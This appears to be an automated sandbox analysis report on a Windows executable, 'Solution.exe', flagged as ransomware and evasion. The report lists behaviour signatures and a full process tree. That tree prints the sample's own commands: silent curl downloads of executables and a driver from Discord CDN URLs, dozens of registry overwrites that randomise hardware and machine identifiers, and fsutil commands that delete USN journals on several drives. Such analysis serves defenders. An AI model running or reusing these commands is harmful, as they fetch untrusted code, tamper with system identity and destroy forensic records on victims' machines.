a585bd6752b089d60a8dbbc20c834dc12da6a6ea0c6c7f73508622f980c17496

Analysis

max time kernel
120s
max time network
125s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
04/02/2024, 12:08

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Solution.exe
Size

87KB
MD5

07100752d2eb92cba41b96830af28afe
SHA1

28128412006dbee0cf91f99dbb9c99006766f27b
SHA256

a585bd6752b089d60a8dbbc20c834dc12da6a6ea0c6c7f73508622f980c17496
SHA512

fe1cb01aacde39c887861c454a0f5f49e9d0733b9d7aed67d53d8215d3a86b661fb24851cc441e4aeda92dc595398c0edc5d5267a2bf376c6eb1a82b4b059eb7
SSDEEP

768:RnnPgd1c7o737Zc70XQcPatzmkdUmAE8AJqZEsOTuO+m6BGTAmdpsnv46QP+N7fa:RnnI7c8TS7qa9mEV0OxhTAmAv46Qcmd

Score

9^/10

evasion ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1932	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Enumerates connected drives 3 TTPs 3 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\D:	fsutil.exe
File opened (read-only)	\??\E:	fsutil.exe
File opened (read-only)	\??\F:	fsutil.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2244	sc.exe
888	sc.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "101933452-160714654-3061310299"	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "1019614201-116728717-816014226"	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2256	ipconfig.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
2104	vssadmin.exe

Modifies registry key 1 TTPs 54 IoCs

Modify Registry

T1112

pid	Process
2392	reg.exe
2416	reg.exe
484	reg.exe
1000	reg.exe
3004	reg.exe
1680	reg.exe
2936	reg.exe
2684	reg.exe
2304	reg.exe
1252	reg.exe
1424	reg.exe
1296	reg.exe
2792	reg.exe
2512	reg.exe
568	reg.exe
2764	reg.exe
2956	reg.exe
2652	reg.exe
2620	reg.exe
2248	reg.exe
2752	reg.exe
1588	reg.exe
1596	reg.exe
472	reg.exe
2772	reg.exe
2552	reg.exe
1716	reg.exe
1144	reg.exe
1280	reg.exe
2492	reg.exe
2776	reg.exe
2528	reg.exe
2068	reg.exe
2748	reg.exe
2564	reg.exe
2924	reg.exe
2728	reg.exe
2616	reg.exe
1084	reg.exe
2580	reg.exe
2864	reg.exe
2888	reg.exe
1016	reg.exe
2628	reg.exe
2724	reg.exe
2060	reg.exe
3056	reg.exe
2892	reg.exe
2148	reg.exe
576	reg.exe
1480	reg.exe
2828	reg.exe
2532	reg.exe
2860	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
880	powershell.exe
2824	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	880	powershell.exe
Token: SeBackupPrivilege	1968	vssvc.exe
Token: SeRestorePrivilege	1968	vssvc.exe
Token: SeAuditPrivilege	1968	vssvc.exe
Token: SeDebugPrivilege	2824	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1992 wrote to memory of 2204	1992	Solution.exe	29
PID 1992 wrote to memory of 2204	1992	Solution.exe	29
PID 1992 wrote to memory of 2204	1992	Solution.exe	29
PID 1992 wrote to memory of 2592	1992	Solution.exe	30
PID 1992 wrote to memory of 2592	1992	Solution.exe	30
PID 1992 wrote to memory of 2592	1992	Solution.exe	30
PID 1992 wrote to memory of 2984	1992	Solution.exe	31
PID 1992 wrote to memory of 2984	1992	Solution.exe	31
PID 1992 wrote to memory of 2984	1992	Solution.exe	31
PID 1992 wrote to memory of 2904	1992	Solution.exe	32
PID 1992 wrote to memory of 2904	1992	Solution.exe	32
PID 1992 wrote to memory of 2904	1992	Solution.exe	32
PID 1992 wrote to memory of 2264	1992	Solution.exe	33
PID 1992 wrote to memory of 2264	1992	Solution.exe	33
PID 1992 wrote to memory of 2264	1992	Solution.exe	33
PID 1992 wrote to memory of 1900	1992	Solution.exe	34
PID 1992 wrote to memory of 1900	1992	Solution.exe	34
PID 1992 wrote to memory of 1900	1992	Solution.exe	34
PID 1992 wrote to memory of 2224	1992	Solution.exe	35
PID 1992 wrote to memory of 2224	1992	Solution.exe	35
PID 1992 wrote to memory of 2224	1992	Solution.exe	35
PID 1992 wrote to memory of 2376	1992	Solution.exe	36
PID 1992 wrote to memory of 2376	1992	Solution.exe	36
PID 1992 wrote to memory of 2376	1992	Solution.exe	36
PID 2376 wrote to memory of 2652	2376	cmd.exe	37
PID 2376 wrote to memory of 2652	2376	cmd.exe	37
PID 2376 wrote to memory of 2652	2376	cmd.exe	37
PID 1992 wrote to memory of 2660	1992	Solution.exe	38
PID 1992 wrote to memory of 2660	1992	Solution.exe	38
PID 1992 wrote to memory of 2660	1992	Solution.exe	38
PID 2660 wrote to memory of 2792	2660	cmd.exe	39
PID 2660 wrote to memory of 2792	2660	cmd.exe	39
PID 2660 wrote to memory of 2792	2660	cmd.exe	39
PID 1992 wrote to memory of 2808	1992	Solution.exe	40
PID 1992 wrote to memory of 2808	1992	Solution.exe	40
PID 1992 wrote to memory of 2808	1992	Solution.exe	40
PID 2808 wrote to memory of 2828	2808	cmd.exe	41
PID 2808 wrote to memory of 2828	2808	cmd.exe	41
PID 2808 wrote to memory of 2828	2808	cmd.exe	41
PID 1992 wrote to memory of 2896	1992	Solution.exe	42
PID 1992 wrote to memory of 2896	1992	Solution.exe	42
PID 1992 wrote to memory of 2896	1992	Solution.exe	42
PID 2896 wrote to memory of 3004	2896	cmd.exe	43
PID 2896 wrote to memory of 3004	2896	cmd.exe	43
PID 2896 wrote to memory of 3004	2896	cmd.exe	43
PID 1992 wrote to memory of 2664	1992	Solution.exe	44
PID 1992 wrote to memory of 2664	1992	Solution.exe	44
PID 1992 wrote to memory of 2664	1992	Solution.exe	44
PID 2664 wrote to memory of 2620	2664	cmd.exe	45
PID 2664 wrote to memory of 2620	2664	cmd.exe	45
PID 2664 wrote to memory of 2620	2664	cmd.exe	45
PID 1992 wrote to memory of 2656	1992	Solution.exe	46
PID 1992 wrote to memory of 2656	1992	Solution.exe	46
PID 1992 wrote to memory of 2656	1992	Solution.exe	46
PID 2656 wrote to memory of 2616	2656	cmd.exe	47
PID 2656 wrote to memory of 2616	2656	cmd.exe	47
PID 2656 wrote to memory of 2616	2656	cmd.exe	47
PID 1992 wrote to memory of 2644	1992	Solution.exe	48
PID 1992 wrote to memory of 2644	1992	Solution.exe	48
PID 1992 wrote to memory of 2644	1992	Solution.exe	48
PID 2644 wrote to memory of 2248	2644	cmd.exe	49
PID 2644 wrote to memory of 2248	2644	cmd.exe	49
PID 2644 wrote to memory of 2248	2644	cmd.exe	49
PID 1992 wrote to memory of 2996	1992	Solution.exe	50

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\Solution.exe
"C:\Users\Admin\AppData\Local\Temp\Solution.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c color f
  2⤵
  PID:2204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c pause >nul
  2⤵
  PID:2592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1185313074098471014/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe >nul
  2⤵
  PID:2984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1185313079655923892/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys >nul
  2⤵
  PID:2904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1185313094755426345/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe >nul
  2⤵
  PID:2264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1185313100396777592/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe >nul
  2⤵
  PID:1900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1185313104968560762/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat >nul
  2⤵
  PID:2224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d %random% /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2376
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d 10193 /f
    3⤵
    - Modifies registry key
    PID:2652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d %random% /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2660
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d 10193 /f
    3⤵
    - Modifies registry key
    PID:2792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2808
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {101933452-160714654-3061310299} /f
    3⤵
    - Modifies registry key
    PID:2828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2896
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d 101933452-160714654-3061310299 /f
    3⤵
    - Modifies registry key
    PID:3004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2664
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {101933452-160714654-3061310299} /f
    3⤵
    - Modifies registry key
    PID:2620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2656
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {101933452-160714654-3061310299} /f
    3⤵
    - Modifies registry key
    PID:2616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2644
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 101933452-160714654-3061310299 /f
    3⤵
    - Modifies registry key
    PID:2248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2996
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d 101933452-160714654-3061310299 /f
    3⤵
    - Modifies registry key
    PID:2628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2832
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d 101933452-160714654-3061310299 /f
    3⤵
    - Modifies registry key
    PID:2776
  - - C:\Windows\system32\fsutil.exe
      fsutil usn deletejournal /n C:
      4⤵
      PID:2832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2788
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d 101933452-160714654-3061310299 /f
    3⤵
    - Modifies registry key
    PID:1252
  - - C:\Windows\system32\fsutil.exe
      fsutil usn deletejournal /n D:
      4⤵
      Enumerates connected drives
      PID:2788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2964
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d 101933452-160714654-3061310299 /f
    3⤵
    - Modifies registry key
    PID:2532
  - - C:\Windows\system32\fsutil.exe
      fsutil usn deletejournal /n E:
      4⤵
      Enumerates connected drives
      PID:2964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2692
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d 101933452-160714654-3061310299 /f
    3⤵
    - Modifies registry key
    PID:2392
  - - C:\Windows\system32\fsutil.exe
      fsutil usn deletejournal /n F:
      4⤵
      Enumerates connected drives
      PID:2692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2676
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d 101933452-160714654-3061310299 /f
    3⤵
    - Modifies registry key
    PID:2684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:744
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 101933452-160714654-3061310299 /f
    3⤵
    - Modifies registry key
    PID:2564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2624
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 101933452-160714654-3061310299 /f
    3⤵
    - Modifies registry key
    PID:2512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2520
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d 101933452-160714654-3061310299 /f
    3⤵
    - Enumerates system info in registry
    - Modifies registry key
    PID:2528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2560
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d 1019614201-116728717-816014226 /f
    3⤵
    - Enumerates system info in registry
    - Modifies registry key
    PID:2580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul >nul
  2⤵
  PID:2632
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {1019614201-116728717-816014226} /f
    3⤵
    - Modifies registry key
    PID:2068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul >nul
  2⤵
  PID:2180
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d 1019614201-116728717-816014226 /f
    3⤵
    - Modifies registry key
    PID:2552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul >nul
  2⤵
  PID:2380
- - C:\Windows\system32\reg.exe
    reg add HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d 1019614201-116728717-816014226 /f
    3⤵
    - Modifies registry key
    PID:1680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2096
- - C:\Windows\system32\reg.exe
    reg add HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d 1019614201-116728717-816014226 /f
    3⤵
    - Modifies registry key
    PID:2492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1772
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d 1019614201-116728717-816014226 /f
    3⤵
    - Modifies registry key
    PID:1084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1644
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 1019614201-116728717-816014226 /f
    3⤵
    - Modifies registry key
    PID:2752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2768
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 1019614201-116728717-816014226 /f
    3⤵
    - Modifies registry key
    PID:2864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul >nul
  2⤵
  PID:2872
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d 1019614201-116728717-816014226 /f
    3⤵
    - Modifies registry key
    PID:2888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul >nul
  2⤵
  PID:2836
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 1019614201-116728717-816014226 /f
    3⤵
    - Modifies registry key
    PID:2860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2876
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d 1019614201-116728717-816014226 /f
    3⤵
    - Modifies registry key
    PID:2892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2908
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d 1019614201-116728717-816014226 /f
    3⤵
    - Modifies registry key
    PID:2924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2920
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d 1019614201-116728717-816014226 /f
    3⤵
    - Modifies registry key
    PID:1716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2496
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d 1019614201-116728717-816014226 /f
    3⤵
    - Modifies registry key
    PID:2936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1592
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d 1019614201-116728717-816014226 /f
    3⤵
    - Modifies registry key
    PID:2724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1036
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 1019614201-116728717-816014226 /f
    3⤵
    - Modifies registry key
    PID:2304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOwner /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1712
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOwner /t REG_SZ /d 1019614201-116728717-816014226 /f
    3⤵
    - Modifies registry key
    PID:2416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOrganization /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1600
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOrganization /t REG_SZ /d 1019614201-116728717-816014226 /f
    3⤵
    - Modifies registry key
    PID:1588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1608
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d 1019614201-116728717-816014226 /f
    3⤵
    - Modifies registry key
    PID:1596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:312
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d 1019614201-116728717-816014226 /f
    3⤵
    - Modifies registry key
    PID:2748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1952
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d 1019924949-1903120013-1847418153 /f
    3⤵
    - Modifies registry key
    PID:2148
